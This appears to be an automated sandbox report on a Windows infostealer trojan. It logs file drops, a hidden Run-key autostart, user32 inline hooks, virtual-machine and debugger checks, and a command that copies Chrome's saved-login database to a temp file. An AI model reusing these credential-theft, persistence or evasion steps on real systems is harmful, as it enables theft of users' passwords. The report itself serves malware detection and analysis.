Classification label: mal100.troj.spyw.evad.winEXE@12/9@6/2

Source: C:\Windows\explorer.exe

File created: C:\Program Files (x86)\Adrldefcp

Jump to behavior

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4388:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\Adrldefcp

Jump to behavior

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: f97e137e_by_Libranalysis.exe	Virustotal: Detection: 26%
Source: f97e137e_by_Libranalysis.exe	ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

File read: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe 'C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe'
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\secinit.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\secinit.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

File written: C:\Users\user\AppData\Roaming\50M6QC82\50Mlogri.ini

Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: ipconfig.pdb source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: secinit.pdbGCTL source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, vp21b7dsh.exe.3.dr
Source:	Binary string: wntdll.pdbUGP source: secinit.exe, 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp, ipconfig.exe, 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: secinit.exe, ipconfig.exe
Source:	Binary string: secinit.pdb source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, vp21b7dsh.exe.3.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp

Source: vp21b7dsh.exe.3.dr

Static PE information: 0xF19D1945 [Sat Jun 14 17:17:57 2098 UTC]

Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0389D0D1 push ecx; ret	2_2_0389D0E4
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042DA5E push 2E339416h; ret	2_2_1042DB30
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_104272BD push ebp; iretd	2_2_104272CF
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10426500 push esi; retf	2_2_1042652D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_104265E2 push ebp; ret	2_2_104265E3
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10426601 push esi; retf	2_2_10426602
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042C6C5 push eax; ret	2_2_1042C718
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042C77C push eax; ret	2_2_1042C782
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042C712 push eax; ret	2_2_1042C718
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042C71B push eax; ret	2_2_1042C782
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_104297C4 pushad ; retf	2_2_104297C6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BDD0D1 push ecx; ret	10_2_00BDD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016DA5E push 2E339416h; ret	10_2_0016DB30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_001672BD push ebp; iretd	10_2_001672CF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016C6C5 push eax; ret	10_2_0016C718
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016C712 push eax; ret	10_2_0016C718
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016C71B push eax; ret	10_2_0016C782
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016C77C push eax; ret	10_2_0016C782
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_001697C4 pushad ; retf	10_2_001697C6
Source: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	Code function: 21_2_00F11DC1 push ecx; ret	21_2_00F11DD4

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe			Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\SysWOW64\ipconfig.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 5JFT3T18NV

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xB3 0x3C

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\secinit.exe	RDTSC instruction interceptor: First address: 00000000104198B4 second address: 00000000104198BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\secinit.exe	RDTSC instruction interceptor: First address: 0000000010419B2E second address: 0000000010419B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 00000000001598B4 second address: 00000000001598BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000000159B2E second address: 0000000000159B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\secinit.exe

Code function: 2_2_03876B90 rdtsc

2_2_03876B90

Source: C:\Windows\explorer.exe TID: 6656	Thread sleep time: -56000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 5988	Thread sleep time: -45000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 00000003.00000000.707548734.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.712768115.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.708284479.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.712768115.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.930435954.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000003.00000000.707548734.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.713034911.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000003.00000000.707548734.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.713034911.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000003.00000000.707548734.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\secinit.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\secinit.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\secinit.exe

Code function: 2_2_03876B90 rdtsc

2_2_03876B90

Source: C:\Windows\SysWOW64\secinit.exe

Code function: 2_2_03889780 NtMapViewOfSection,LdrInitializeThunk,

2_2_03889780

Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03851B8F mov eax, dword ptr fs:[00000030h]	2_2_03851B8F
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03851B8F mov eax, dword ptr fs:[00000030h]	2_2_03851B8F
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038FD380 mov ecx, dword ptr fs:[00000030h]	2_2_038FD380
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872397 mov eax, dword ptr fs:[00000030h]	2_2_03872397
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03858794 mov eax, dword ptr fs:[00000030h]	2_2_03858794
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387B390 mov eax, dword ptr fs:[00000030h]	2_2_0387B390
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7794 mov eax, dword ptr fs:[00000030h]	2_2_038C7794
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7794 mov eax, dword ptr fs:[00000030h]	2_2_038C7794
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7794 mov eax, dword ptr fs:[00000030h]	2_2_038C7794
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0390138A mov eax, dword ptr fs:[00000030h]	2_2_0390138A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874BAD mov eax, dword ptr fs:[00000030h]	2_2_03874BAD
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874BAD mov eax, dword ptr fs:[00000030h]	2_2_03874BAD
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874BAD mov eax, dword ptr fs:[00000030h]	2_2_03874BAD
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03915BA5 mov eax, dword ptr fs:[00000030h]	2_2_03915BA5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C53CA mov eax, dword ptr fs:[00000030h]	2_2_038C53CA
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C53CA mov eax, dword ptr fs:[00000030h]	2_2_038C53CA
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]	2_2_038703E2
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]	2_2_038703E2
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]	2_2_038703E2
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]	2_2_038703E2
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]	2_2_038703E2
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]	2_2_038703E2
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038837F5 mov eax, dword ptr fs:[00000030h]	2_2_038837F5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A70E mov eax, dword ptr fs:[00000030h]	2_2_0387A70E
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A70E mov eax, dword ptr fs:[00000030h]	2_2_0387A70E
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0390131B mov eax, dword ptr fs:[00000030h]	2_2_0390131B
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386F716 mov eax, dword ptr fs:[00000030h]	2_2_0386F716
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0391070D mov eax, dword ptr fs:[00000030h]	2_2_0391070D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0391070D mov eax, dword ptr fs:[00000030h]	2_2_0391070D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DFF10 mov eax, dword ptr fs:[00000030h]	2_2_038DFF10
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DFF10 mov eax, dword ptr fs:[00000030h]	2_2_038DFF10
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03844F2E mov eax, dword ptr fs:[00000030h]	2_2_03844F2E
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03844F2E mov eax, dword ptr fs:[00000030h]	2_2_03844F2E
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387E730 mov eax, dword ptr fs:[00000030h]	2_2_0387E730
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384DB40 mov eax, dword ptr fs:[00000030h]	2_2_0384DB40
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385EF40 mov eax, dword ptr fs:[00000030h]	2_2_0385EF40
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918B58 mov eax, dword ptr fs:[00000030h]	2_2_03918B58
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384F358 mov eax, dword ptr fs:[00000030h]	2_2_0384F358
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384DB60 mov ecx, dword ptr fs:[00000030h]	2_2_0384DB60
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385FF60 mov eax, dword ptr fs:[00000030h]	2_2_0385FF60
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918F6A mov eax, dword ptr fs:[00000030h]	2_2_03918F6A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03873B7A mov eax, dword ptr fs:[00000030h]	2_2_03873B7A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03873B7A mov eax, dword ptr fs:[00000030h]	2_2_03873B7A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DFE87 mov eax, dword ptr fs:[00000030h]	2_2_038DFE87
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387D294 mov eax, dword ptr fs:[00000030h]	2_2_0387D294
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387D294 mov eax, dword ptr fs:[00000030h]	2_2_0387D294
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038452A5 mov eax, dword ptr fs:[00000030h]	2_2_038452A5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038452A5 mov eax, dword ptr fs:[00000030h]	2_2_038452A5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038452A5 mov eax, dword ptr fs:[00000030h]	2_2_038452A5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038452A5 mov eax, dword ptr fs:[00000030h]	2_2_038452A5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038452A5 mov eax, dword ptr fs:[00000030h]	2_2_038452A5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C46A7 mov eax, dword ptr fs:[00000030h]	2_2_038C46A7
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03910EA5 mov eax, dword ptr fs:[00000030h]	2_2_03910EA5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03910EA5 mov eax, dword ptr fs:[00000030h]	2_2_03910EA5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03910EA5 mov eax, dword ptr fs:[00000030h]	2_2_03910EA5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0385AAB0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0385AAB0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387FAB0 mov eax, dword ptr fs:[00000030h]	2_2_0387FAB0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918ED6 mov eax, dword ptr fs:[00000030h]	2_2_03918ED6
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038736CC mov eax, dword ptr fs:[00000030h]	2_2_038736CC
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872ACB mov eax, dword ptr fs:[00000030h]	2_2_03872ACB
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038FFEC0 mov eax, dword ptr fs:[00000030h]	2_2_038FFEC0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03888EC7 mov eax, dword ptr fs:[00000030h]	2_2_03888EC7
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872AE4 mov eax, dword ptr fs:[00000030h]	2_2_03872AE4
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038716E0 mov ecx, dword ptr fs:[00000030h]	2_2_038716E0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038576E2 mov eax, dword ptr fs:[00000030h]	2_2_038576E2
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384C600 mov eax, dword ptr fs:[00000030h]	2_2_0384C600
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384C600 mov eax, dword ptr fs:[00000030h]	2_2_0384C600
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384C600 mov eax, dword ptr fs:[00000030h]	2_2_0384C600
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03878E00 mov eax, dword ptr fs:[00000030h]	2_2_03878E00
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03858A0A mov eax, dword ptr fs:[00000030h]	2_2_03858A0A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384AA16 mov eax, dword ptr fs:[00000030h]	2_2_0384AA16
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384AA16 mov eax, dword ptr fs:[00000030h]	2_2_0384AA16
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03845210 mov eax, dword ptr fs:[00000030h]	2_2_03845210
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03845210 mov ecx, dword ptr fs:[00000030h]	2_2_03845210
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03845210 mov eax, dword ptr fs:[00000030h]	2_2_03845210
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03845210 mov eax, dword ptr fs:[00000030h]	2_2_03845210
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03863A1C mov eax, dword ptr fs:[00000030h]	2_2_03863A1C
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A61C mov eax, dword ptr fs:[00000030h]	2_2_0387A61C
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A61C mov eax, dword ptr fs:[00000030h]	2_2_0387A61C
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384E620 mov eax, dword ptr fs:[00000030h]	2_2_0384E620
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03884A2C mov eax, dword ptr fs:[00000030h]	2_2_03884A2C
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03884A2C mov eax, dword ptr fs:[00000030h]	2_2_03884A2C
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038FFE3F mov eax, dword ptr fs:[00000030h]	2_2_038FFE3F
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849240 mov eax, dword ptr fs:[00000030h]	2_2_03849240
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849240 mov eax, dword ptr fs:[00000030h]	2_2_03849240
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849240 mov eax, dword ptr fs:[00000030h]	2_2_03849240
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849240 mov eax, dword ptr fs:[00000030h]	2_2_03849240
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]	2_2_03857E41
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]	2_2_03857E41
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]	2_2_03857E41
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]	2_2_03857E41
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]	2_2_03857E41
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]	2_2_03857E41
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038D4257 mov eax, dword ptr fs:[00000030h]	2_2_038D4257
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385766D mov eax, dword ptr fs:[00000030h]	2_2_0385766D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038FB260 mov eax, dword ptr fs:[00000030h]	2_2_038FB260
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038FB260 mov eax, dword ptr fs:[00000030h]	2_2_038FB260
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388927A mov eax, dword ptr fs:[00000030h]	2_2_0388927A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918A62 mov eax, dword ptr fs:[00000030h]	2_2_03918A62
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386AE73 mov eax, dword ptr fs:[00000030h]	2_2_0386AE73
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386AE73 mov eax, dword ptr fs:[00000030h]	2_2_0386AE73
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386AE73 mov eax, dword ptr fs:[00000030h]	2_2_0386AE73
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386AE73 mov eax, dword ptr fs:[00000030h]	2_2_0386AE73
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386AE73 mov eax, dword ptr fs:[00000030h]	2_2_0386AE73
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A185 mov eax, dword ptr fs:[00000030h]	2_2_0387A185
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386C182 mov eax, dword ptr fs:[00000030h]	2_2_0386C182
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872581 mov eax, dword ptr fs:[00000030h]	2_2_03872581
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872581 mov eax, dword ptr fs:[00000030h]	2_2_03872581
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872581 mov eax, dword ptr fs:[00000030h]	2_2_03872581
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872581 mov eax, dword ptr fs:[00000030h]	2_2_03872581
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03842D8A mov eax, dword ptr fs:[00000030h]	2_2_03842D8A
